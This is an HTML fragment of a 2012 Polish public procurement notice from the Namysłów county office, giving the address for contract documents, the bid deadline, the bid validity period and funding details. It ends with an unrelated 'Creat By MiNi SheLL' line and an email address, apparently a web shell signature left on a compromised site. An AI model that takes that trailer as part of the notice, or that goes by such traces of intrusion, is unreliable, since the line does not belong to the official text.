<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Namysłowie, Pl. Wolności 12A, 46-100 Namysłów, 
Wydział Inwestycji, Zamówień Publicznych i Zarządzania Nieruchomościami, 
pok. nr 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Namysłowie, Pl. Wolności 12A, 46-100 Namysłów, 
Wydział Inwestycji, Zamówień Publicznych i Zarządzania Nieruchomościami, 
pok. nr 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com